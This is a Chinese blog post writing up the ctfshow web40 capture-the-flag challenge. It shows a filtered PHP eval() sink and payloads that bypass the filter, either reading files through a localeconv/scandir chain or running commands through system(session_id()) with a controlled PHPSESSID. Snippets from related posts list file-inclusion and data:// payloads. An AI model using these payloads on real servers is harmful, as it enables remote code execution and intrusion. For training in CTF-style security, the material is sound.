ctfshow web40利用session进行rce

最新推荐文章于 2024-06-07 17:25:56 发布
最新推荐文章于 2024-06-07 17:25:56 发布
阅读量449 收藏 1
点赞数
分类专栏: RCE # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/118572112
版权

期末考考完了应该继续学习网安了。
之前一段时间去尝试挖cnvd,也是混到了自己的第一张cnvd证书,虽然是没有什么技术含量的洞,但也让我觉得很开心。放出来分享一下
在这里插入图片描述

但证书都是次要的,重要的是自己能力的提升。
之前买了ctfshow的vip题,遇到了一个之前不知道的trick,记录一下。
源码

<?php

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

这题给了两个解法 第一种解法跟[GXYCTF2019]禁止套娃的解法一样

?c=highlight_file(next(next(next(scandir(current(localeconv()))))));

localeconv() 函数返回一包含本地数字及货币格式信息的数组。
scandir() 列出 images 目录中的文件和目录。
readfile() 输出一个文件。
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
next() 函数将内部指针指向数组中的下一个元素,并输出。
array_reverse()以相反的元素顺序返回数组。
highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。

主要看第二个解法
官方给的wp
c=session_start();system(session_id());
很好懂,但以前没想到过这种解法,学习到了
之后修改PHPSESSID就可以命令执行了
在这里插入图片描述

但PHPSESSID只能写入数字和大小写英文字符,所以没有成功读到flag,但可以作为做题的参考。

补充

既然只能传入字母和数字,想着可以用base64解码一下,这样传入的PHPSESSID可以全为字母和数字
但这道题源码里对数字进行了过滤,我们无法使用base64_decode()函数,所以决定本地试一下
测试源码

<?php
    $c = $_GET['c'];
    eval($c);

payload

?c=session_start();system(base64_decode(session_id()));

在这里插入图片描述

在这里插入图片描述
执行成功。

fmyyy1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 453
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或和取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
CTF从入门到提升(十三)文件包含session及例题详解
anquanniu的博客
09-12 2742
具体场景——session 我们可以查一下手册,看看这个参数是默认开启: 举栗子 ​ 通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。 这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,file...
CTFshow——文件包含
D.MIND 的博客
02-07 2153
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
CTFweb篇-Session包含
weixin_44597701的博客
08-07 3892
什么是Session Session就是保存在服务器的文本文件。 默认情况下,PHP.ini 中设置的 SESSION 保存方式是 files(session.save_handler = files),即使用读写文件的方式保存 SESSION 数据,而 SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列化之后的 SESSIO
ctfshow-web入门-命令执行(web37-web40
最新发布
Welcome To Myon'Blog !
06-07 1699
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
CTFshow 命令执行 web40
Kradress的博客
10-30 1683
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
phpstudy后门rce批量利用脚本的实现
10-15
这篇内容对于安全研究者和Web开发者来说具有教育价值,它展示了如何识别和利用安全漏洞,同时也提醒了用户需要注意系统的安全性,防止被类似攻击。 总之,了解并掌握这类脚本的原理和实现,有助于提升网络安全意识...
溯源系列:溯源(八)之利用goby RCE 进行反制黑客
01-06
在"溯源系列:溯源(八)之利用goby RCE 进行反制黑客"中,我们关注的是如何利用goby语言的远程代码执行(RCE)特性来对抗黑客攻击。goby是一种轻量级的编程语言,它被设计成具有高安全性,同时又能快速执行,这使得...
ShiroExploit.V2.3rce图形化利用.zip
06-25
ShiroExploit.V2.3 shiro远程命令执行 550 721 一键漏洞利用 rce 图形化利用.zip
TDOA_RCE:通达OA综合利用工具
03-03
任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 工具利用流程 1.优先利用本地文件包含漏洞 原因是本地文件包含...
NGINX-RCE:nginx的rce漏洞利用
04-04
NGINX-RCE nginx的rce漏洞利用怎么运行呢? 首先只需使用gcc gcc expl0itz.c -o expl0itz 然后chmod chmod +x expl0itz 像二进制文件一样运行之后! ./expl0itz
ctfshow-WEB-web11( 利用session绕过登录验证)
热门推荐
wangyuxiang946的博客
09-06 1万+
ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过 页面中直接给了源码, 很明显是让我们进行代码审计,源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功 右键检查或者按F12, 进入开发者模式, 查看浏览器的session, 后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直...
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 986
eval() 利用与正则绕过,PHP 伪协议、include() 利用
CTFShow-WEB入门篇命令执行详细Wp(29-40)
Aluxian_的博客
06-10 2510
【代码】CTFShow-WEB入门篇--命令执行详细Wp。
CTF从入门到提升(十四)session phpinfo包含及例题详解
anquanniu的博客
09-16 1889
具体场景——session PHP默认生成的session文件往往存放在/tmp目录下 举栗子 ​ 题目内容:看看我的notebooktips; tips:文件包含phpinfo是不是有新的发现 用给到的内容去做题目,我们可以看一下这道题目,进来之后首页找到url。 如果把php删掉,会发现登录入口不存在,初步推断php是后缀名会自动拼接到URL后面。 有了这个设想判断后,我们去读文件log...
ctfshow每周大挑战
Innocence_0的博客
02-04 915
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如下图所示,POST传参时,参数名为code,后台对 “(”、“.” 做了替换。
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3021
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
ctfshow web入门反序列化263——学习session的两种存储方式
qq_45766062的博客
09-14 742
一. 题目分析: 跑dirsearch发现有个www.zip压缩包,是网站的源码,通过源码分析,我先梳理解题思路: (1)首先访问首页,建立session,并获得cookie。 (2)然后将cookie修改为反序列化字符串 (3)访问check.php实现反序列化shell的写入 (4)访问log-1.php,获取flag 废话不多说直接上exp: <?php class User{ public $username; public $password; public $sta
ctfshow web rce
09-12
根据提供的引用内容来看,这是关于CTFShow网站的Web远程代码执行(RCE)的问题。根据引用中的数据包,我们可以看到一个POST请求的HTML表单,其中包含一个文件上传字段。而根据引用中的源代码,我们可以看到一个GET...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值